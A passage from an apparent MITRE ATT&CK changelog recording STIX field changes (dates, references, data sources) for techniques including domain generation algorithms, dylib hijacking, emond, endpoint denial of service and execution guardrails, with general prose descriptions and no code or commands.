This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

[T1574.004] Hijack Execution Flow: Dylib Hijacking

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAmanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.
external_referencesCAPEC-471
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-471
external_referencesApple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 20:19:15.212000+00:002022-05-05 04:08:30.203000+00:00
external_references[1]['source_name']capecMalwareUnicorn macOS Dylib Injection MachO
external_references[1]['url']https://capec.mitre.org/data/definitions/471.htmlhttps://malwareunicorn.org/workshops/macos_dylib_injection.html#5
external_references[2]['source_name']Wardle Dylib Hijack Vulnerable AppsApple Developer Doco Archive Run-Path
external_references[2]['description']Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.
external_references[2]['url']https://objective-see.com/blog/blog_0x46.htmlhttps://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html
external_references[4]['source_name']Github EmpireProject HijackScannerWriting Bad Malware for OSX
external_references[4]['description']Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.
external_references[4]['url']https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.pyhttps://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
external_references[5]['source_name']Github EmpireProject CreateHijacker DylibWardle Dylib Hijack Vulnerable Apps
external_references[5]['description']Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.
external_references[5]['url']https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.pyhttps://objective-see.com/blog/blog_0x46.html
external_references[6]['source_name']Writing Bad Malware for OSXwardle artofmalware volume1
external_references[6]['description']Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.
external_references[6]['url']https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdfhttps://taomm.org/vol1/pdfs.html
external_references[7]['source_name']wardle artofmalware volume1Github EmpireProject HijackScanner
external_references[7]['description']Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.
external_references[7]['url']https://taomm.org/vol1/pdfs.htmlhttps://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py
external_references[8]['source_name']MalwareUnicorn macOS Dylib Injection MachOGithub EmpireProject CreateHijacker Dylib
external_references[8]['description']Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.
external_references[8]['url']https://malwareunicorn.org/workshops/macos_dylib_injection.html#5https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
external_references[9]['source_name']Apple Developer Doco Archive Run-Pathcapec
external_references[9]['url']https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.htmlhttps://capec.mitre.org/data/definitions/471.html
x_mitre_data_sources[1]File: File ModificationModule: Module Load
x_mitre_data_sources[2]Module: Module LoadFile: File Modification
x_mitre_defense_bypassed[0]Application controlApplication Control

[T1568] Dynamic Resolution

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-02 01:37:39.938000+00:002022-03-11 18:26:23.782000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T1548.004] Abuse Elevation Control Mechanism: Elevated Execution with Prompt

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 12:04:37.823000+00:002022-10-19 16:35:18.492000+00:00
external_references[2]['source_name']Death by 1000 installers; it's all broken!Carbon Black Shlayer Feb 2019
external_references[2]['description']Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
external_references[2]['url']https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html
external_references[3]['source_name']Carbon Black Shlayer Feb 2019Death by 1000 installers; it's all broken!
external_references[3]['description']Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.
external_references[3]['url']https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
x_mitre_data_sources[0]Process: OS API ExecutionProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationProcess: OS API Execution

[T1546.014] Event Triggered Execution: Emond

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 21:37:25.307000+00:002022-04-20 00:16:01.732000+00:00
external_references[1]['source_name']xorrior emond Jan 2018magnusviri emond Apr 2016
external_references[1]['description']Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.
external_references[1]['url']https://www.xorrior.com/emond-persistence/http://www.magnusviri.com/Mac/what-is-emond.html
external_references[2]['source_name']magnusviri emond Apr 2016xorrior emond Jan 2018
external_references[2]['description']Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.
external_references[2]['url']http://www.magnusviri.com/Mac/what-is-emond.htmlhttps://www.xorrior.com/emond-persistence/
x_mitre_data_sources[0]Process: Process CreationFile: File Creation
x_mitre_data_sources[3]File: File CreationProcess: Process Creation

[T1499] Endpoint Denial of Service

Current version: 1.1


Old Description
New Description
t1Adversaries may perform Endpoint Denial of Service (DoS) attt1Adversaries may perform Endpoint Denial of Service (DoS) att
>acks to degrade or block the availability of services to use>acks to degrade or block the availability of services to use
>rs. Endpoint DoS can be performed by exhausting the system r>rs. Endpoint DoS can be performed by exhausting the system r
>esources those services are hosted on or exploiting the syst>esources those services are hosted on or exploiting the syst
>em to cause a persistent crash condition. Example services i>em to cause a persistent crash condition. Example services i
>nclude websites, email services, DNS, and web-based applicat>nclude websites, email services, DNS, and web-based applicat
>ions. Adversaries have been observed conducting DoS attacks >ions. Adversaries have been observed conducting DoS attacks 
>for political purposes(Citation: FireEye OpPoisonedHandover >for political purposes(Citation: FireEye OpPoisonedHandover 
>February 2016) and to support other malicious activities, in>February 2016) and to support other malicious activities, in
>cluding distraction(Citation: FSISAC FraudNetDoS September 2>cluding distraction(Citation: FSISAC FraudNetDoS September 2
>012), hacktivism, and extortion.(Citation: Symantec DDoS Oct>012), hacktivism, and extortion.(Citation: Symantec DDoS Oct
>ober 2014)  An Endpoint DoS denies the availability of a ser>ober 2014)  An Endpoint DoS denies the availability of a ser
>vice without saturating the network used to provide access t>vice without saturating the network used to provide access t
>o the service. Adversaries can target various layers of the >o the service. Adversaries can target various layers of the 
>application stack that is hosted on the system used to provi>application stack that is hosted on the system used to provi
>de the service. These layers include the Operating Systems (>de the service. These layers include the Operating Systems (
>OS), server applications such as web servers, DNS servers, d>OS), server applications such as web servers, DNS servers, d
>atabases, and the (typically web-based) applications that si>atabases, and the (typically web-based) applications that si
>t on top of them. Attacking each layer requires different te>t on top of them. Attacking each layer requires different te
>chniques that take advantage of bottlenecks that are unique >chniques that take advantage of bottlenecks that are unique 
>to the respective components. A DoS attack may be generated >to the respective components. A DoS attack may be generated 
>by a single system or multiple systems spread across the int>by a single system or multiple systems spread across the int
>ernet, which is commonly referred to as a distributed DoS (D>ernet, which is commonly referred to as a distributed DoS (D
>DoS).  To perform DoS attacks against endpoint resources, se>DoS).  To perform DoS attacks against endpoint resources, se
>veral aspects apply to multiple methods, including IP addres>veral aspects apply to multiple methods, including IP addres
>s spoofing and botnets.  Adversaries may use the original IP>s spoofing and botnets.  Adversaries may use the original IP
> address of an attacking system, or spoof the source IP addr> address of an attacking system, or spoof the source IP addr
>ess to make the attack traffic more difficult to trace back >ess to make the attack traffic more difficult to trace back 
>to the attacking system or to enable reflection. This can in>to the attacking system or to enable reflection. This can in
>crease the difficulty defenders have in defending against th>crease the difficulty defenders have in defending against th
>e attack by reducing or eliminating the effectiveness of fil>e attack by reducing or eliminating the effectiveness of fil
>tering by the source address on network defense devices.  Bo>tering by the source address on network defense devices.  Bo
>tnets are commonly used to conduct DDoS attacks against netw>tnets are commonly used to conduct DDoS attacks against netw
>orks and services. Large botnets can generate a significant >orks and services. Large botnets can generate a significant 
>amount of traffic from systems spread across the global inte>amount of traffic from systems spread across the global inte
>rnet. Adversaries may have the resources to build out and co>rnet. Adversaries may have the resources to build out and co
>ntrol their own botnet infrastructure or may rent time on an>ntrol their own botnet infrastructure or may rent time on an
> existing botnet to conduct an attack. In some of the worst > existing botnet to conduct an attack. In some of the worst 
>cases for DDoS, so many systems are used to generate request>cases for DDoS, so many systems are used to generate request
>s that each one only needs to send out a small amount of tra>s that each one only needs to send out a small amount of tra
>ffic to produce enough volume to exhaust the target's resour>ffic to produce enough volume to exhaust the target's resour
>ces. In such circumstances, distinguishing DDoS traffic from>ces. In such circumstances, distinguishing DDoS traffic from
> legitimate clients becomes exceedingly difficult. Botnets h> legitimate clients becomes exceedingly difficult. Botnets h
>ave been used in some of the most high-profile DDoS attacks,>ave been used in some of the most high-profile DDoS attacks,
> such as the 2012 series of incidents that targeted major US> such as the 2012 series of incidents that targeted major US
> banks.(Citation: USNYAG IranianBotnet March 2016)  In cases> banks.(Citation: USNYAG IranianBotnet March 2016)  In cases
> where traffic manipulation is used, there may be points in > where traffic manipulation is used, there may be points in 
>the the global network (such as high traffic gateway routers>the global network (such as high traffic gateway routers) wh
>) where packets can be altered and cause legitimate clients >ere packets can be altered and cause legitimate clients to e
>to execute code that directs network packets toward a target>xecute code that directs network packets toward a target in 
> in high volume. This type of capability was previously used>high volume. This type of capability was previously used for
> for the purposes of web censorship where client HTTP traffi> the purposes of web censorship where client HTTP traffic wa
>c was modified to include a reference to JavaScript that gen>s modified to include a reference to JavaScript that generat
>erated the DDoS code to overwhelm target web servers.(Citati>ed the DDoS code to overwhelm target web servers.(Citation: 
>on: ArsTechnica Great Firewall of China)  For attacks attemp>ArsTechnica Great Firewall of China)  For attacks attempting
>ting to saturate the providing network, see [Network Denial > to saturate the providing network, see [Network Denial of S
>of Service](https://attack.mitre.org/techniques/T1498). >ervice](https://attack.mitre.org/techniques/T1498). 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_referencesFS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.
external_referencesGoodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.
external_referencesNed Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.
external_referencesCAPEC-227
external_referencesCAPEC-131
external_referencesCAPEC-130
external_referencesCAPEC-125
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-227
external_referencesCAPEC-131
external_referencesCAPEC-130
external_referencesCAPEC-125
external_referencesWueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.
external_referencesPreet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.
external_referencesGoodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 12:05:31.985000+00:002022-04-12 14:48:40.313000+00:00
descriptionAdversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
external_references[1]['source_name']capecCisco DoSdetectNetflow
external_references[1]['url']https://capec.mitre.org/data/definitions/227.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
external_references[2]['source_name']capecFSISAC FraudNetDoS September 2012
external_references[2]['url']https://capec.mitre.org/data/definitions/131.htmlhttps://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
external_references[3]['source_name']capecArsTechnica Great Firewall of China
external_references[3]['url']https://capec.mitre.org/data/definitions/130.htmlhttps://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/
external_references[4]['source_name']capecFireEye OpPoisonedHandover February 2016
external_references[4]['url']https://capec.mitre.org/data/definitions/125.htmlhttps://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
external_references[5]['source_name']FireEye OpPoisonedHandover February 2016USNYAG IranianBotnet March 2016
external_references[5]['description']Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.htmlhttps://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
external_references[6]['source_name']FSISAC FraudNetDoS September 2012Symantec DDoS October 2014
external_references[6]['description']FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.
external_references[6]['url']https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdfhttps://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
external_references[7]['source_name']Symantec DDoS October 2014capec
external_references[7]['url']https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdfhttps://capec.mitre.org/data/definitions/227.html
external_references[8]['source_name']USNYAG IranianBotnet March 2016capec
external_references[8]['url']https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-chargedhttps://capec.mitre.org/data/definitions/131.html
external_references[9]['source_name']ArsTechnica Great Firewall of Chinacapec
external_references[9]['url']https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/https://capec.mitre.org/data/definitions/130.html
external_references[10]['source_name']Cisco DoSdetectNetflowcapec
external_references[10]['url']https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdfhttps://capec.mitre.org/data/definitions/125.html
x_mitre_data_sources[0]Sensor Health: Host StatusNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Application Log: Application Log ContentNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network Traffic: Network Traffic ContentSensor Health: Host Status
x_mitre_data_sources[3]Network Traffic: Network Traffic FlowApplication Log: Application Log Content

[T1480.001] Execution Guardrails: Environmental Keying

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-06-09 18:53:58.159000+00:002022-05-04 14:52:51.290000+00:00
external_references[1]['source_name']EK Clueless AgentsProofpoint Router Malvertising
external_references[1]['description']Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.
external_references[1]['url']https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdfhttps://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
external_references[3]['source_name']Proofpoint Router MalvertisingEbowla: Genetic Malware
external_references[3]['description']Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.
external_references[3]['url']https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-deviceshttps://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
external_references[4]['source_name']EK Impeding Malware AnalysisEK Clueless Agents
external_references[4]['description']Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.
external_references[4]['url']https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdfhttps://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
external_references[5]['source_name']Environmental Keyed HTAEK Impeding Malware Analysis
external_references[5]['description']Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
external_references[5]['url']https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
external_references[6]['source_name']Ebowla: Genetic MalwareDemiguise Guardrail Router Logo
external_references[6]['description']Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.
external_references[6]['url']https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdfhttps://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
external_references[7]['source_name']Demiguise Guardrail Router LogoEnvironmental Keyed HTA
external_references[7]['description']Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019.
external_references[7]['url']https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.jshttps://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_defense_bypassed[1]Host forensic analysisHost Forensic Analysis
x_mitre_defense_bypassed[2]Signature-based detectionSignature-based Detection
x_mitre_defense_bypassed[3]Static file analysisStatic File Analysis

[T1480] Execution Guardrails

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-06-09 18:53:58.471000+00:002022-05-03 02:39:29.314000+00:00
external_references[1]['source_name']FireEye Kevin Mandia GuardrailsFireEye Outlook Dec 2019
external_references[1]['description']Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.
external_references[1]['url']https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
external_references[2]['source_name']FireEye Outlook Dec 2019FireEye Kevin Mandia Guardrails
external_references[2]['description']McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.htmlhttps://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
x_mitre_defense_bypassed[1]Host forensic analysisHost Forensic Analysis
x_mitre_defense_bypassed[2]Signature-based detectionSignature-based Detection
x_mitre_defense_bypassed[3]Static file analysisStatic File Analysis

[T1011] Exfiltration Over Other Network Medium

Current version: 1.1


Old Description
New Description
t1Adversaries may attempt to exfiltrate data over a different t1Adversaries may attempt to exfiltrate data over a different 
>network medium than the command and control channel. If the >network medium than the command and control channel. If the 
>command and control network is a wired Internet connection, >command and control network is a wired Internet connection, 
>the exfiltration may occur, for example, over a WiFi connect>the exfiltration may occur, for example, over a WiFi connect
>ion, modem, cellular data connection, Bluetooth, or another >ion, modem, cellular data connection, Bluetooth, or another 
>radio frequency (RF) channel.  Adversaries may choose to do >radio frequency (RF) channel.  Adversaries may choose to do 
>this if they have sufficient access or proximity, and the co>this if they have sufficient access or proximity, and the co
>nnection might not be secured or defended as well as the pri>nnection might not be secured or defended as well as the pri
>mary Internet-connected channel because it is not routed thr>mary Internet-connected channel because it is not routed thr
>ough the same enterprise network>ough the same enterprise network.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_network_requirementsTrue
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 00:35:24.570000+00:002022-03-08 21:02:16.115000+00:00
